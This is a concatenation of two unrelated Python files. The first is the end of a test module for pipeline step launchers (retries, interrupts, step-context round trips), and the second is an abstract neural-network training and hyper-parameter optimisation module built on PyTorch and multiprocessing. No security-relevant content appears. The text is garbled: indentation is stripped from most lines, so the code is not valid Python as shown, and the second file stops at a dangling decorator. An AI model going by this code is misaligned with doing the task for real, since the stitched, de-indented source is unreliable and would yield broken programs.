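#         "intermediate_storage": {"filesystem": {"config": {"base_dir": "/tmp/scratch"}}},
#     }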
class RequestRetryLocalExternalStepLauncher(LocalExternalStepLauncher):
def launch_step(self, step_context, prior_attempts_count):
if prior_attempts_count == 0:
raise RetryRequested()
else:
return super(RequestRetryLocalExternalStepLauncher, self).launch_step(
step_context, prior_attempts_count
)
@resource(config_schema=local_external_step_launcher.config_schema)
def request_retry_local_external_step_launcher(context):
return RequestRetryLocalExternalStepLauncher(**context.resource_config)
def define_basic_pipeline():
@solid(required_resource_keys=set(["first_step_launcher"]), config_schema={"a": Field(str)})
def return_two(_):
return 2
@solid(required_resource_keys=set(["second_step_launcher"]))
def add_one(_, num):
return num + 1
@pipeline(
mode_defs=[
ModeDefinition(
"external",
resource_defs={
"first_step_launcher": local_external_step_launcher,
"second_step_launcher": local_external_step_launcher,
},
),
ModeDefinition(
"internal_and_external",
resource_defs={
"first_step_launcher": no_step_launcher,
"second_step_launcher": local_external_step_launcher,
},
),
ModeDefinition(
"request_retry",
resource_defs={
"first_step_launcher": request_retry_local_external_step_launcher,
"second_step_launcher": request_retry_local_external_step_launcher,
},
),
]
)
def basic_pipeline():
add_one(return_two())
return basic_pipeline
def define_sleepy_pipeline():
@solid(
config_schema={"tempfile": Field(String)},
required_resource_keys=set(["first_step_launcher"]),
)
def sleepy_solid(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
start_time = time.time()
while True:
time.sleep(0.1)
if time.time() - start_time > 120:
raise Exception("Timed out")
@pipeline(
mode_defs=[
ModeDefinition(
"external",
resource_defs={
"first_step_launcher": local_external_step_launcher,
},
),
]
)
def sleepy_pipeline():
sleepy_solid()
return sleepy_pipeline
def initialize_step_context(scratch_dir, instance):
pipeline_run = PipelineRun(
pipeline_name="foo_pipeline",
run_id=str(uuid.uuid4()),
run_config=make_run_config(scratch_dir, "external"),
mode="external",
)
recon_pipeline = reconstructable(define_basic_pipeline)
plan = create_execution_plan(recon_pipeline, pipeline_run.run_config, mode="external")
initialization_manager = PipelineExecutionContextManager(
recon_pipeline,
plan,
pipeline_run.run_config,
pipeline_run,
instance,
)
for _ in initialization_manager.prepare_context():
pass
pipeline_context = initialization_manager.get_context()
step_context = pipeline_context.for_step(plan.get_step_by_key("return_two"))
return step_context
def test_step_context_to_step_run_ref():
with DagsterInstance.ephemeral() as instance:
step_context = initialize_step_context("", instance)
step = step_context.step
step_run_ref = step_context_to_step_run_ref(step_context, 0)
assert step_run_ref.run_config == step_context.pipeline_run.run_config
assert step_run_ref.run_id == step_context.pipeline_run.run_id
rehydrated_step_context = step_run_ref_to_step_context(step_run_ref, instance)
assert rehydrated_step_context.required_resource_keys == step_context.required_resource_keys
rehydrated_step = rehydrated_step_context.step
assert rehydrated_step.pipeline_name == step.pipeline_name
assert rehydrated_step.step_inputs == step.step_inputs
assert rehydrated_step.step_outputs == step.step_outputs
assert rehydrated_step.kind == step.kind
assert rehydrated_step.solid_handle.name == step.solid_handle.name
assert rehydrated_step.logging_tags == step.logging_tags
assert rehydrated_step.tags == step.tags
def test_local_external_step_launcher():
with tempfile.TemporaryDirectory() as tmpdir:
with DagsterInstance.ephemeral() as instance:
step_context = initialize_step_context(tmpdir, instance)
step_launcher = LocalExternalStepLauncher(tmpdir)
events = list(step_launcher.launch_step(step_context, 0))
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_START in event_types
assert DagsterEventType.STEP_SUCCESS in event_types
assert DagsterEventType.STEP_FAILURE not in event_types
@pytest.mark.parametrize("mode", ["external", "internal_and_external"])
def test_pipeline(mode):
with tempfile.TemporaryDirectory() as tmpdir:
result = execute_pipeline(
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=make_run_config(tmpdir, mode),
)
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
def test_launcher_requests_retry():
mode = "request_retry"
with tempfile.TemporaryDirectory() as tmpdir:
result = execute_pipeline(
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=make_run_config(tmpdir, mode),
)
assert result.success
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
for step_key, events in result.events_by_step_key.items():
if step_key:
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_UP_FOR_RETRY in event_types
assert DagsterEventType.STEP_RESTARTED in event_types
def _send_interrupt_thread(temp_file):
while not os.path.exists(temp_file):
time.sleep(0.1)
send_interrupt()
@pytest.mark.parametrize("mode", ["external"])
def test_interrupt_step_launcher(mode):
with tempfile.TemporaryDirectory() as tmpdir:
with safe_tempfile_path() as success_tempfile:
sleepy_run_config = {
"resources": {"first_step_launcher": {"config": {"scratch_dir": tmpdir}}},
"intermediate_storage": {"filesystem": {"config": {"base_dir": tmpdir}}},
"solids": {"sleepy_solid": {"config": {"tempfile": success_tempfile}}},
}
interrupt_thread = Thread(target=_send_interrupt_thread, args=(success_tempfile,))
interrupt_thread.start()
results = []
received_interrupt = False
try:
for result in execute_pipeline_iterator(
pipeline=reconstructable(define_sleepy_pipeline),
mode=mode,
run_config=sleepy_run_config,
):
results.append(result.event_type)
except DagsterExecutionInterruptedError:
received_interrupt = True
assert received_interrupt
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
interrupt_thread.join()
def test_multiproc_launcher_requests_retry():
mode = "request_retry"
with tempfile.TemporaryDirectory() as tmpdir:
run_config = make_run_config(tmpdir, mode)
run_config["execution"] = {"multiprocess": {}}
result = execute_pipeline(
instance=DagsterInstance.local_temp(tmpdir),
pipeline=reconstructable(define_basic_pipeline),
mode=mode,
run_config=run_config,
)
assert result.success
assert result.result_for_solid("return_two").output_value() == 2
assert result.result_for_solid("add_one").output_value() == 3
for step_key, events in result.events_by_step_key.items():
if step_key:
event_types = [event.event_type for event in events]
assert DagsterEventType.STEP_UP_FOR_RETRY in event_types
assert DagsterEventType.STEP_RESTARTED in event_types
|
simple_net_abstract.py
|
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import abc
import atexit
import math
import multiprocessing
import queue
import time
from copy import deepcopy
import pickle as rick
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
from functools import reduce
from multiprocessing.managers import SharedMemoryManager
from pathlib import Path
from typing import Union, Tuple, Dict, Optional, Iterable, TypeVar, List, Callable, final, \
Final
import numpy as np # type: ignore
from torch import nn
from torch.utils.data import Dataset
from bann.b_container.constants.file_names import TrainSubStrSuf
from bann.b_data_functions.pytorch.p_gen_fun import re_copy_model
from bann.b_test_train_prepare.pytorch.prepare_interface import PrepareInterfaceArgs, \
PrepareInterface
from bann.b_data_functions.pytorch.shared_memory_interface import DataSetSharedMemoryA, SmmConManger
from bann.b_hyper_optim.fun_const_wr.hyper_fun import h_map_dict_to_tuple, h_create_flat_params, \
h_create_hyper_space
from bann.b_container.states.general.net.net_general import NetGeneralState
from bann.b_frameworks.pytorch.pytorch_lego_const import LegoContInit
from bann.b_container.states.general.interface.init_state import InitState
from bann.b_frameworks.pytorch.net_model_interface import InitContainer
from bann.b_container.functions.pytorch.state_string_format import create_hyper_param_str
from bann.b_frameworks.errors.custom_erors import KnownSimpleAnnError
from bann.b_container.functions.pytorch.hyper_framework_fun import create_hyper_arguments, \
update_hyper_params, update_hyper_container
from bann.b_test_train_prepare.pytorch.tester_interface import TesterInterfaceArgs
from bann.b_hyper_optim.hyper_optim_interface import HyperOptimReturnElem, \
HyperOptimInterfaceArgs, HGenTA
from bann.b_test_train_prepare.pytorch.trainer_interface import TrainerInterfaceArgs, \
TrainerInterface
from bann.b_frameworks.pytorch.net_model_interface import NetModelInterface, CurrentNetData
from bann.b_pan_integration.framwork_key_lib import FrameworkKeyLib
from bann.b_container.functions.pytorch.init_framework_fun import InitNetArgs
from pan.public.constants.net_tree_id_constants import ANNTreeIdType
from pan.public.constants.test_net_stats_constants import TestNNStatsElementType
from pan.public.constants.train_net_stats_constants import TrainNNStatsElementType, \
create_train_net_stats_function, TrainNNStatsElemInfo, TrainNNStatsElementFiller, \
TrainReturnFiller
from pan.public.interfaces.pub_net_interface import NodeANNDataElemInterface, NetSavable
from rewowr.public.functions.worker_ctx import get_worker_ctx
from rewowr.public.interfaces.logger_interface import SyncStdoutInterface
from rewowr.public.errors.custom_errors import KnownError
from rewowr.public.functions.decorator_functions import rewowr_process_wrapper, \
ProcessWrapperFun
_FRAMEWORK: Final[str] = FrameworkKeyLib.PYTORCH.value
def get_simple_net_framework() -> str:
return _FRAMEWORK
_ExtraType = TypeVar('_ExtraType')
def _create_hyper_params(args: HyperOptimInterfaceArgs, /) -> Dict[str, HyperOptimReturnElem]:
return {
name: HyperOptimReturnElem(
param=args.hyper_args[name], state_type=args.state_type[name]
)
        for name in args.hyper_args
}
_TrFitParam = List[Tuple[float, Dict[str, HyperOptimReturnElem]]]
_TrFitAl = Tuple[_TrFitParam, List[float]]
_TrainArgs = List[Tuple[
TrainerInterfaceArgs, HyperOptimInterfaceArgs, TrainerInterface, PrepareInterface
]]
def _calc_dev(variance: float, space: float, /) -> float:
if not space:
return 0.0
res = variance / space
if res < 1.0:
return res
return 1.0
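# Editor's note: _calc_dev normalises a standard deviation by the width of the
# corresponding search space and clamps the result to [0.0, 1.0], e.g.:
#     _calc_dev(2.0, 8.0) -> 0.25
#     _calc_dev(5.0, 2.0) -> 1.0   (clamped)
#     _calc_dev(3.0, 0.0) -> 0.0   (degenerate, empty space)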
def _create_deviation_tuple(hyper_param_t: _TrFitAl,
hyper_args: List[HyperOptimInterfaceArgs], /) -> List[float]:
flat_params_l = [
h_create_flat_params(hyper_args_e.hyper_args) for hyper_args_e in hyper_args
]
if len(flat_params_l) <= 1 or sum(elem.sum_el for elem in flat_params_l) <= 1:
return [0.0, 0.0]
space_list = reduce(
lambda num3, num4: list(map(lambda num5, num6: num5 + num6, num3, num4)), (
list(map(
lambda num1, num2: num1 - num2,
h_space.search_space_max, h_space.search_space_min
))
for h_space in (
h_create_hyper_space(
hyper_args_e.hyper_max_args, hyper_args_e.hyper_min_args,
hyper_args_e.min_max_types, flat_params_l[h_index]
)
for h_index, hyper_args_e in enumerate(hyper_args)
)
)
)
flatten_param_list = [
h_map_dict_to_tuple(hyper_param_e[1], flat_params_l[h_index])
for h_index, hyper_param_e in enumerate(hyper_param_t[0])
]
return [
_calc_dev(float(elem), space_list[num1])
for num1, elem in enumerate(
np.std([flatten_p[h_index] for flatten_p in flatten_param_list])
for h_index in range(len(flatten_param_list[0]))
)
]
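# Editor's note: for every flattened hyper-parameter dimension,
# _create_deviation_tuple takes the standard deviation of the values sampled
# across all runs and divides it by the accumulated width of that dimension's
# search space via _calc_dev, giving a per-dimension spread measure in [0, 1].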
@final
@dataclass
class _ResQueueEl:
fit_0: float
fit_1: float
in_id: int
state_dict: bytes
@final
@dataclass
class _YieldQueueElWr:
data: TrainNNStatsElementType
def _process_run_fun(index_id: int, prep: PrepareInterface, yield_queue: multiprocessing.Queue,
args: PrepareInterfaceArgs, sync_out: SyncStdoutInterface, /) -> None:
for erg in prep.run_train(sync_out, args):
yield_queue.put(_YieldQueueElWr(erg))
yield_queue.put(_ResQueueEl(
fit_0=prep.fitness[0], fit_1=prep.fitness[1], in_id=index_id,
state_dict=rick.dumps(prep.p_state_dict, protocol=rick.HIGHEST_PROTOCOL)
))
@final
@dataclass
class _ProcessCon:
ctx: multiprocessing.context.SpawnContext
target: ProcessWrapperFun
args: Tuple[
SyncStdoutInterface, str, Callable[..., None],
Tuple[
int, PrepareInterface, multiprocessing.Queue, PrepareInterfaceArgs, SyncStdoutInterface
]
]
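# Editor's note: _get_from_queue below implements a bounded process pool. It
# starts at most `pr_cnt` of the prepared processes up front, drains their
# shared queue, and whenever the queue read times out it checks for workers
# that have finished and launches an equal number of queued processes in their
# place, until every process has reported a _ResQueueEl result.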
def _get_from_queue(sync_out: SyncStdoutInterface, pr_cont: List[_ProcessCon],
yr_queues: multiprocessing.Queue, res_dict: Dict[int, _ResQueueEl],
pr_cnt: int, /) -> Iterable[TrainNNStatsElementType]:
pr_list = []
id_el = 0
while id_el < pr_cnt and not sync_out.error_occurred():
buffer_c = pr_cont[id_el]
pr_list.append(buffer_c.ctx.Process(target=buffer_c.target, args=buffer_c.args))
pr_list[id_el].start()
id_el += 1
max_id = pr_cnt
running = not sync_out.error_occurred()
finished_ids: List[int] = []
while running:
try:
erg_buf = yr_queues.get(True, 2)
        except queue.Empty:
            # Timed out: count the workers that have finished since the last
            # check and start an equal number of queued processes in their place.
            newly_finished = 0
            for id_el in range(max_id):
                if not (pr_list[id_el].is_alive() or id_el in finished_ids):
                    newly_finished += 1
                    finished_ids.append(id_el)
            id_el = max_id
            new_stop = max_id + newly_finished if max_id + newly_finished < len(pr_cont) else len(pr_cont)
while id_el < new_stop and not sync_out.error_occurred():
max_id += 1
buffer_c = pr_cont[id_el]
pr_list.append(buffer_c.ctx.Process(target=buffer_c.target, args=buffer_c.args))
pr_list[id_el].start()
id_el += 1
if sync_out.error_occurred():
running = False
else:
running = len(finished_ids) < len(pr_cont) or len(res_dict) < len(pr_cont)
else:
if isinstance(erg_buf, _YieldQueueElWr):
yield erg_buf.data
elif isinstance(erg_buf, _ResQueueEl):
res_dict[erg_buf.in_id] = erg_buf
elif isinstance(erg_buf, KnownError):
raise erg_buf
else:
raise KnownSimpleAnnError(
f"Expected {_ResQueueEl.__name__} or {_YieldQueueElWr.__name__} "
+ f"got {type(erg_buf).__name__}"
)
def _pre_send_empty(data_t: Tuple[Dataset, ...]) -> None:
for data in data_t:
if isinstance(data, DataSetSharedMemoryA):
data.pre_send_empty()
def _optimise_in_parallel(sync_out: SyncStdoutInterface, process_cnt: int,
train_arguments: _TrainArgs,
tr_fit: _TrFitAl, /) -> Iterable[TrainNNStatsElementType]:
ctx = get_worker_ctx()
if not isinstance(ctx, multiprocessing.context.SpawnContext):
raise KnownSimpleAnnError(f"Expected SpawnContext got {type(ctx).__name__}")
yield_queue = ctx.Queue()
for arg_el in train_arguments:
_pre_send_empty(arg_el[0].input_train)
_pre_send_empty(arg_el[0].input_eval)
pr_list: List[_ProcessCon] = [
_ProcessCon(
ctx=ctx,
target=rewowr_process_wrapper,
args=(
sync_out, "OptimTrainStart", _process_run_fun,
(index_id, args[3], yield_queue, PrepareInterfaceArgs(
trainer_args=args[0], trainer=args[2]
), sync_out)
)
)
for index_id, args in enumerate(train_arguments)
]
res_dict: Dict[int, _ResQueueEl] = {}
yield from _get_from_queue(
sync_out, pr_list, yield_queue, res_dict,
process_cnt if 0 < process_cnt < len(pr_list) else len(pr_list)
)
if len(res_dict) != len(pr_list):
raise KnownSimpleAnnError(f"Expected {len(pr_list)} results, got {len(res_dict)}")
for new_id in range(len(pr_list)):
result_el = res_dict.get(new_id, None)
if result_el is None:
raise KnownSimpleAnnError(f"Missing id {new_id}")
tr_fit[0].append((result_el.fit_0, _create_hyper_params(train_arguments[new_id][1])))
tr_fit[1].append(result_el.fit_1)
re_copy_model(rick.loads(result_el.state_dict),
train_arguments[new_id][0].module.get_net_com)
@final
@dataclass
class _SDataCont:
    loss: List[float] = field(default_factory=list)
    truth: List[float] = field(default_factory=list)
    best_truth: List[float] = field(default_factory=list)
    best_loss: List[float] = field(default_factory=list)
    best_change: List[float] = field(default_factory=list)
    param_deviation: List[float] = field(default_factory=list)
run_cnt: int = 0
@final
@dataclass
class _SConstCont:
best_fit: Tuple[float, Dict[str, HyperOptimReturnElem]]
best_truth: float
file_id: ANNTreeIdType
@final
@dataclass
class _TrainNetStatsCon:
hyper_truth: TrainReturnFiller
hyper_loss: TrainReturnFiller
best_changes: TrainReturnFiller
best_truth: TrainReturnFiller
best_loss: TrainReturnFiller
param_deviation: TrainReturnFiller
@final
class _SimpleTrainDataP:
def __init__(self, hyper_cont: HyperOptimInterfaceArgs, id_file: ANNTreeIdType, /) -> None:
super().__init__()
self._train_net_stat_con = _TrainNetStatsCon(
create_train_net_stats_function(), create_train_net_stats_function(),
create_train_net_stats_function(), create_train_net_stats_function(),
create_train_net_stats_function(), create_train_net_stats_function()
)
self._data_cont = _SDataCont()
self._cost_cont = _SConstCont(
file_id=deepcopy(id_file),
best_fit=(float('inf'), _create_hyper_params(hyper_cont)),
best_truth=-3.0
)
self._cost_cont.file_id.add_modifier(TrainSubStrSuf.FITNESS.value)
@property
    def best_fit_h_param(self) -> Tuple[float, Dict[str, HyperOptimReturnElem]]:
return self._cost_cont.best_fit
def update_fitness(self, tr_fit: _TrFitAl, hyper_args: List[HyperOptimInterfaceArgs], /) \
-> None:
loss = []
truth = []
best_truth = []
best_loss = []
best_change = []
param_deviation = 100. * np.mean(_create_deviation_tuple(tr_fit, hyper_args))
param_div_l = []
for param_id, param in enumerate(tr_fit[0]):
if math.isinf(param[0]):
loss.append(-1e-12)
else:
loss.append(param[0])
truth.append(tr_fit[1][param_id])
            if param[0] <= self.best_fit_h_param[0]:
self._cost_cont.best_fit = deepcopy(param)
self._cost_cont.best_truth = tr_fit[1][param_id]
best_change.append(1.0)
else:
best_change.append(0.0)
            if math.isinf(self.best_fit_h_param[0]):
best_loss.append(-1e-12)
else:
                best_loss.append(self.best_fit_h_param[0])
best_truth.append(self._cost_cont.best_truth)
param_div_l.append(param_deviation)
self._data_cont = _SDataCont(
loss=loss,
truth=truth,
best_truth=best_truth,
best_loss=best_loss,
best_change=best_change,
param_deviation=param_div_l,
run_cnt=len(tr_fit[1])
)
def plot(self, last: bool, dump: bool, run_id: int, /) -> Iterable[TrainNNStatsElementType]:
if last and run_id == 0 and self._data_cont.run_cnt > 1:
yield from self._plot_in(
False, dump, run_id, (0, int(self._data_cont.run_cnt / 2))
)
yield from self._plot_in(
True, dump, run_id, (int(self._data_cont.run_cnt / 2), self._data_cont.run_cnt)
)
else:
yield from self._plot_in(last, dump, run_id, (0, self._data_cont.run_cnt))
def _plot_in(self, last: bool, dump: bool, run_id: int,
range_id: Tuple[int, int], /) -> Iterable[TrainNNStatsElementType]:
yield self._train_net_stat_con.hyper_truth(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="Truth",
type_series='Leg', name_sub_series="Truth", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.truth[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, plot_data=True, dump=dump, write_data=True, hyper_param=""
)
)
yield self._train_net_stat_con.hyper_loss(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="Loss",
type_series='Leg', name_sub_series="Loss", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.loss[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_truth(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="TruthBest",
type_series='Leg', name_sub_series="Truth", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_truth[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_loss(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="LossBest",
type_series='Leg', name_sub_series="Loss", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_loss[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.best_changes(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="BestChange",
type_series='Leg', name_sub_series="Best", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.best_change[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
yield self._train_net_stat_con.param_deviation(
TrainNNStatsElemInfo(
id_file=self._cost_cont.file_id, name_series="ParamDeviation",
type_series='Leg', name_sub_series="Dev", type_sub_series='Sub',
x_label="hyper run",
y_label='Truth/Loss/Change/Dev',
title="hyper optimization", subtitle=""
),
[run_id + param_id for param_id in range(range_id[0], range_id[1])],
self._data_cont.param_deviation[range_id[0]:range_id[1]],
TrainNNStatsElementFiller(
last=last, dump=dump, hyper_param="", write_data=True, plot_data=True
)
)
@final
@dataclass
class _RunningConst:
fit_plotter: _SimpleTrainDataP
hyper_cont_buffer: HyperOptimInterfaceArgs
init_time: float
run_id: int = 0
running: bool = True
smm_con: Optional[SmmConManger] = None
@property
def run_time_min(self) -> int:
return int((time.time() - self.init_time) / 60)
@property
def smm(self) -> Optional[SharedMemoryManager]:
if self.smm_con is None:
return None
return self.smm_con.smm
def shutdown(self) -> None:
if self.smm_con is not None:
self.smm_con.smm_shutdown()
self.smm_con.smm.join()
self.smm_con = None
def start(self) -> None:
if self.smm_con is not None:
self.smm_con.smm_start()
def init(self) -> None:
if self.smm_con is None:
self.smm_con = SmmConManger()
_TypeBuffer = TypeVar('_TypeBuffer')
class SimpleNetCon(NetModelInterface[_TypeBuffer], abc.ABC):
def __init__(self) -> None:
super().__init__()
self.__current_net: Union[Tuple[float, Dict, Dict], CurrentNetData] = \
self._create_current_net()
self.__buffered_best_net: Optional[CurrentNetData] = deepcopy(self.__current_net)
self.__init_blank_net: Optional[CurrentNetData] = deepcopy(self.__current_net)
@property
@abc.abstractmethod
def lego_init_cont(self) -> LegoContInit:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def _create_current_net(self) -> CurrentNetData:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def _create_current_loaded_net(self, extra_args: InitContainer, /) -> CurrentNetData:
raise NotImplementedError("Abstract method!")
@final
@property
def current_net(self) -> Union[CurrentNetData, Tuple[float, Dict, Dict]]:
return self.__current_net
@final
@property
def buffered_best_net(self) -> CurrentNetData:
if self.__buffered_best_net is None:
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__buffered_best_net
@final
@property
def init_blank_net(self) -> CurrentNetData:
if self.__init_blank_net is None:
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__init_blank_net
@abc.abstractmethod
def remove_before_save(self) -> _TypeBuffer:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def reload_after_save(self, data: _TypeBuffer, /) -> None:
raise NotImplementedError("Abstract method!")
# ----------------------------------------------------------------------------------------------
@final
def redraw_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = self._create_current_net()
@final
def merge_net_model(self, model: NetModelInterface, /) -> None:
if not isinstance(model, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected {SimpleNetCon.__name__} got {type(model).__name__}"
)
self.__current_net = deepcopy(model.current_net)
@final
def re_copy_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__buffered_best_net = deepcopy(self.current_net)
self.__init_blank_net = deepcopy(self.current_net)
@final
def re_init_current_net(self, new_net: CurrentNetData, /) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = deepcopy(new_net)
self.__buffered_best_net = deepcopy(new_net)
self.__init_blank_net = deepcopy(new_net)
@final
def update_current_net(self, fitness: float, /) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
old_fitness = self.buffered_best_net.fitness
self.__current_net.fitness = fitness
if fitness <= old_fitness:
self.__buffered_best_net = deepcopy(self.__current_net)
@final
def reset_current_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.init_blank_net)
@final
def set_best_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.buffered_best_net)
@final
@property
def get_net_com(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.com
@final
@property
def get_net_lego(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.lego
@final
def save(self) -> Tuple[
bytes, Tuple[CurrentNetData, CurrentNetData, CurrentNetData], _TypeBuffer
]:
cr_net = self.current_net
if not isinstance(cr_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
buf_net = self.buffered_best_net
self.__current_net = (buf_net.fitness, buf_net.com.state_dict(), buf_net.lego.state_dict())
init_net = self.init_blank_net
self.__buffered_best_net = None
self.__init_blank_net = None
rem_buf = self.remove_before_save()
erg = (
rick.dumps(self, protocol=rick.HIGHEST_PROTOCOL),
(cr_net, buf_net, init_net), rem_buf
)
return erg
@final
def save_complete(self, saved_net: Tuple[CurrentNetData, ...],
saved_buf: _TypeBuffer, /) -> None:
if isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately saved!")
if len(saved_net) != 3:
raise KnownSimpleAnnError(f"Expected saved_net tuple length 3 got {len(saved_net)}!")
for elem in saved_net:
if not isinstance(elem, CurrentNetData):
raise KnownSimpleAnnError(f"Expected CurrentNetData got {type(elem).__name__}!")
self.__current_net = saved_net[0]
self.__buffered_best_net = saved_net[1]
self.__init_blank_net = saved_net[2]
self.reload_after_save(saved_buf)
@final
def load_tuple_dict_stats(self, data: Tuple[float, Dict, Dict],
extra_args: InitContainer, /) -> None:
self.__current_net = self._create_current_loaded_net(extra_args)
self.__current_net.fitness = data[0]
self.__current_net.com.load_state_dict(data[1])
self.__current_net.com.eval()
self.__current_net.lego.load_state_dict(data[2])
self.__current_net.lego.eval()
self.__buffered_best_net = deepcopy(self.__current_net)
self.__init_blank_net = deepcopy(self.__current_net)
@classmethod
@final
def load(cls, data: bytes, extra_args: InitContainer, /) -> 'SimpleNetCon':
if not isinstance(extra_args, InitContainer):
raise KnownSimpleAnnError(
f"Expected args to be {InitContainer.__name__} got {type(extra_args).__name__}!"
)
loaded_net = rick.loads(data)
if not isinstance(loaded_net, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected bytes to be {SimpleNetCon.__name__} got {type(loaded_net).__name__}!"
)
loaded_tuple = loaded_net.current_net
if not isinstance(loaded_tuple, tuple):
raise KnownSimpleAnnError(
f"Expected tuple got {type(loaded_tuple).__name__}!"
)
if len(loaded_tuple) != 3:
raise KnownSimpleAnnError(
f"Expected tuple to have 3 elements got {len(loaded_tuple)}!"
)
if not (isinstance(loaded_tuple[0], float)
and isinstance(loaded_tuple[1], dict)
and isinstance(loaded_tuple[2], dict)):
raise KnownSimpleAnnError("Received wrong typed tuple!")
casted_tuple = (
float(loaded_tuple[0]),
{**loaded_tuple[1]},
{**loaded_tuple[2]}
)
loaded_net.load_tuple_dict_stats(casted_tuple, extra_args)
return loaded_net
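# Editor's note: the save()/save_complete()/load() protocol above is a
# three-step round trip; a sketch, assuming `net` is a concrete SimpleNetCon
# subclass instance and `extra_args` a matching InitContainer:
#     raw, nets, buf = net.save()          # nets/buf hold the unpicklable parts
#     net.save_complete(nets, buf)         # restore the live instance in place
#     clone = SimpleNetCon.load(raw, extra_args)   # later: rebuild from bytes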
@final
@dataclass
class _SimpleANNCon:
test_data: Optional[Tuple[Dataset, ...]] = None
train_data: Optional[Tuple[Dataset, ...]] = None
eval_data: Optional[Tuple[Dataset, ...]] = None
stop_op_fp: Optional[Path] = None
is_trainable: Tuple[bool, bool] = (True, False)
def _unlink_if_exists(file_p: Path, /) -> None:
if file_p.exists() and file_p.is_file():
file_p.unlink()
@final
class DataSetTypes(Enum):
TRAIN = 'TrainData'
TEST = 'TestData'
EVAL = 'EvalData'
def _move_data_to_shared_mem(data_t: Optional[Tuple[Dataset, ...]],
smm: SharedMemoryManager, /) -> None:
if data_t is not None:
for data in data_t:
if isinstance(data, DataSetSharedMemoryA):
data.move_data_to_shared_memory(smm)
class SimpleAnnNet(
NodeANNDataElemInterface[nn.Module, CurrentNetData, _TypeBuffer, InitContainer],
abc.ABC
):
def __init__(self, args: InitNetArgs, /) -> None:
super().__init__()
self.__arguments_con = args
self.__data_container = _SimpleANNCon()
self.__savable: Optional[
NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]
] = None
self.__net_module: Optional[SimpleNetCon] = None
self.__data_name = "NotSet"
@final
def get_node_name(self) -> str:
return self.__data_name
@final
def set_node_name(self, name: str) -> None:
self.__data_name = name
@final
def _move_data_sets_to_shared_memory(self, smm: Optional[SharedMemoryManager], /) -> None:
if smm is not None:
_move_data_to_shared_mem(self.__data_container.train_data, smm)
_move_data_to_shared_mem(self.__data_container.eval_data, smm)
@abc.abstractmethod
def re_read_data(self, data_type: DataSetTypes, /) -> Optional[Tuple[Dataset, ...]]:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_net_state(self) -> NetGeneralState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
